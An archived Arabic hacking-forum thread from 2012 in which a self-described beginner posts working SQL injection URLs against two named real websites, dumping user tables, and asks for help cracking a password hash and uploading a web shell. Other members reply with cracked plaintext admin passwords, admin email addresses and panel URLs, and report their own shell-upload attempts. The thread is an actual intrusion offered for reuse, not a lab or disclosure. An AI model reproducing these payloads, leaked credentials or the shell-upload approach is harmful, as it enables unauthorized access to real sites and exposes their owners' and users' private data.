:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/f343.html)
-   -   مساعدة ياشباب مع أول استهداف لى (http://www.vbspiders.com/vb/t60248.html)

__MiM0__ 01-16-2012 01:59 AM

مساعدة ياشباب مع أول استهداف لى
 
السلام عليكم ورحمة الله وبركاتة

اولا انا بشكر كل القائمين على المنتدى وعلى الدورات المحترفة جدا جدا وخصوصا الاخ فولكانو
دلوقتى ياشباب انا تابعت دورة الحقن والحمد لله استفدت منها كتير
وقررت انى استهدف احد المواقع
واستخرجت الاى بى والمواقع الموجودة عليه وفعلا وجدت مواقع مصابة
وقمت بالتطبيق على احد المواقع واستخرجت اليوزر والباسورد
بس للاسف مش قادر افك تشفير الباسورد
اتمنى ياشباب حد يساعدنى فى الموضوع ده ويقولى الحقنة بتاعتى مظبوطة ام يوجد بها اخطاء
كود PHP:

http://livepolitica.com/feed.php?id=-19 union /*!select*/ 1,2,3,4,5,/*!group_concat(user_id,0x3a,user_name,0x3a,user_pass,0x3a,user_email)*/,7,8+from+livepo5_liveforum.users-- 

Anonymous
98aadb37083eddd855c27feccb15dc8c5b127fd0
anonymous@anonymous.com


__MiM0__ 01-16-2012 02:22 AM

رد: مساعدة ياشباب مع أول استهداف لى
 
:showoff::showoff::showoff::showoff::showoff::show off:
تم تجربة حقن احد المواقع الاخرى الموجودة على السيرفر وتم استخراج اليوزر والباسورد
وتم الدخول على الادمن الخاصة بالموقع بالموقع
كود PHP:

http://chiirichtown.com/album.php?id=-36 union /*!select*/ 1,2,/*!concat(US_Id,0x3a,US_Loginname,0x3a,US_Password,0x3a,US_Email)*/,4,5,6,7+from+tbl_users-- 

ملحوظة الباسورد بعد فك التشفيرة هو :: password
http://chiirichtown.com/admin

ويوجد جدول اخر

كود PHP:

http://chiirichtown.com/album.php?id=-36 union /*!select*/ 1,2,/*!concat(l_id,0x3a,LoginName,0x3a,Password,0x3a,Email)*/,4,5,6,7+from+tbl_login-- 

وجربت اليوزر ادمن وادمن على السى بنل ولكن لم ينفع
ممكن ياشباب حد يقولى ينفع ارفع شل على السيرفر من لوحة الادمن ام لا ؟؟ وان كانت الاجابة اه ممكن شرح او درس للطريقة
والف شكرا مقدما

google.com 01-16-2012 04:28 AM

رد: مساعدة ياشباب مع أول استهداف لى
 
حبيبي
رابط اللوحة http://chiirichtown.com/admin/
اليوزر
sijo@richtown.ae
الباسورد
richtown
انا دخلت حاولت ارفع شل لكن الموقع مانع الاكواد
حاولت ارفع شل صورة
لكن الموقع مانع الاكواد
تحياتي


__MiM0__ 01-16-2012 05:03 AM

رد: مساعدة ياشباب مع أول استهداف لى
 
اقتباس:

المشاركة الأصلية كتبت بواسطة google.com (المشاركة 421387)
حبيبي
رابط اللوحة http://chiirichtown.com/admin/
اليوزر
sijo@richtown.ae
الباسورد
richtown
انا دخلت حاولت ارفع شل لكن الموقع مانع الاكواد
حاولت ارفع شل صورة
لكن الموقع مانع الاكواد
تحياتي


اولا انا بشكرك اخى على ردك واهتمامك بالموضوع
ثانيا اخى
جميع اليوزرات والباسوردات الموجودة بالحقن ديه تستطيع الدخول بها وانا قمت بتجربتهم
قبل طرحى للموضوع
كود PHP:

   http://chiirichtown.com/album.php?id=-36 union /*!select*/ 1,2,/*!concat(US_Id,0x3a,US_Loginname,0x3a,US_Password,0x3a,US_Email)*/,4,5,6,7+from+tbl_users-- 

وبالنسببة للشل مينفعش ارفعة من الموقع ده ؟؟
وبالنسبة للباسورد المشفر بالمشاركة الاولى
98aadb37083eddd855c27feccb15dc8c5b127fd0
حضرتك حاولت معاه ولا لا ؟؟

x-men 01-16-2012 12:45 PM

رد: مساعدة ياشباب مع أول استهداف لى
 
اقتباس:

المشاركة الأصلية كتبت بواسطة __MiM0__ (المشاركة 421349)
السلام عليكم ورحمة الله وبركاتة

اولا انا بشكر كل القائمين على المنتدى وعلى الدورات المحترفة جدا جدا وخصوصا الاخ فولكانو
دلوقتى ياشباب انا تابعت دورة الحقن والحمد لله استفدت منها كتير
وقررت انى استهدف احد المواقع
واستخرجت الاى بى والمواقع الموجودة عليه وفعلا وجدت مواقع مصابة
وقمت بالتطبيق على احد المواقع واستخرجت اليوزر والباسورد
بس للاسف مش قادر افك تشفير الباسورد
اتمنى ياشباب حد يساعدنى فى الموضوع ده ويقولى الحقنة بتاعتى مظبوطة ام يوجد بها اخطاء
كود PHP:

http://livepolitica.com/feed.php?id=-19 union /*!select*/ 1,2,3,4,5,/*!group_concat(user_id,0x3a,user_name,0x3a,user_pass,0x3a,user_email)*/,7,8+from+livepo5_liveforum.users-- 

Anonymous
98aadb37083eddd855c27feccb15dc8c5b127fd0
anonymous@anonymous.com


اخي الكريم الباسورد هو :live
يوزر الادمن هو:asuraphel@gmail.com يطلب منك الاميل للدخول وليس اسم اليوز وهذا هو اميل الادمن
مسار لوحة التحكم:http://livepolitica.com/login.php

اذا بدك اي شي انا حاضر ان شاء الله
تحياتي لك وموفق في اختراقك يا بطل

x-men 01-16-2012 01:17 PM

رد: مساعدة ياشباب مع أول استهداف لى
 
اقتباس:

المشاركة الأصلية كتبت بواسطة __MiM0__ (المشاركة 421357)
:showoff::showoff::showoff::showoff::showoff::show off:
تم تجربة حقن احد المواقع الاخرى الموجودة على السيرفر وتم استخراج اليوزر والباسورد
وتم الدخول على الادمن الخاصة بالموقع بالموقع
كود PHP:

http://chiirichtown.com/album.php?id=-36 union /*!select*/ 1,2,/*!concat(US_Id,0x3a,US_Loginname,0x3a,US_Password,0x3a,US_Email)*/,4,5,6,7+from+tbl_users-- 

ملحوظة الباسورد بعد فك التشفيرة هو :: password
http://chiirichtown.com/admin

ويوجد جدول اخر

كود PHP:

http://chiirichtown.com/album.php?id=-36 union /*!select*/ 1,2,/*!concat(l_id,0x3a,LoginName,0x3a,Password,0x3a,Email)*/,4,5,6,7+from+tbl_login-- 

وجربت اليوزر ادمن وادمن على السى بنل ولكن لم ينفع
ممكن ياشباب حد يقولى ينفع ارفع شل على السيرفر من لوحة الادمن ام لا ؟؟ وان كانت الاجابة اه ممكن شرح او درس للطريقة
والف شكرا مقدما

اخي العزيز اول شي :6: مبروك :6: بس الموقع امراتي يعني عربي

وبرمجه خاصه لو تبقى تحاول الى الصباح لا تستطيع عمل شي :no: لانه لا يسمح برفع ملف غير صوره والصوره ما تستطيع تستعرضه لو رفعتها
بالنسبه

لليوزر فهو :siegend اسم الشركه الي عامله السكربت وعلى ما اعتقد استضافه كمان
الباسورد:password أضعف باسورد

تحياتي لك نصيحه لك شوف موقع ثاني يعني ليس الاختراق غايه انما انت حققت اكثر من اختراق وحقنت الموقع يعني لو اخترقتو ما تستفيد شي ( الا اذا كان مراهنه او عداوه)لوول

__MiM0__ 01-16-2012 05:27 PM

رد: مساعدة ياشباب مع أول استهداف لى
 
اقتباس:

المشاركة الأصلية كتبت بواسطة x-men (المشاركة 421401)
اخي الكريم الباسورد هو :live
يوزر الادمن هو:asuraphel@gmail.com يطلب منك الاميل للدخول وليس اسم اليوز وهذا هو اميل الادمن
مسار لوحة التحكم:http://livepolitica.com/login.php

اذا بدك اي شي انا حاضر ان شاء الله
تحياتي لك وموفق في اختراقك يا بطل


اولا انا بحييك اخى الغالى على مساعدتك واهتمامك بالموضوع
انا فعلا عرفت افك هاش الباسورد ولكن كنت استخدم اسم الدخول
Anonymous
وكان يطلعلى خطأ لذلك اعتقدت ان انا اخطأت فى فك الباسورد
:tears:

__MiM0__ 01-16-2012 05:30 PM

رد: مساعدة ياشباب مع أول استهداف لى
 
اقتباس:

المشاركة الأصلية كتبت بواسطة x-men (المشاركة 421402)
اخي العزيز اول شي :6: مبروك :6: بس الموقع امراتي يعني عربي

وبرمجه خاصه لو تبقى تحاول الى الصباح لا تستطيع عمل شي :no: لانه لا يسمح برفع ملف غير صوره والصوره ما تستطيع تستعرضه لو رفعتها
بالنسبه

لليوزر فهو :siegend اسم الشركه الي عامله السكربت وعلى ما اعتقد استضافه كمان
الباسورد:password أضعف باسورد

تحياتي لك نصيحه لك شوف موقع ثاني يعني ليس الاختراق غايه انما انت حققت اكثر من اختراق وحقنت الموقع يعني لو اخترقتو ما تستفيد شي ( الا اذا كان مراهنه او عداوه)لوول

صدقنى اخى والله لم اكن اعرف انه امارتى
حتى لو الموقع امريكى انا الموقع ده لن اضرة بشىء انا فقط مهتم بموقع اخرع لى نفس السيرفر وهو ليس تحدى :biggrin: انا لسة مبتدىء بالمواقع :biggrin::biggrin:
والف شكر ليك ياغالى على توضيحك لنقطة عدم القدرة على رفع شل من خلال الموقع هذا
وهو فعلا يوجد موقع اخر على نفس السيرفر مصاب ولكن حقنة صعب وانا بحاول معاه على قد ما ااقدر وان شاء الله اوصل لنتيجة :122:


الساعة الآن 01:16 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0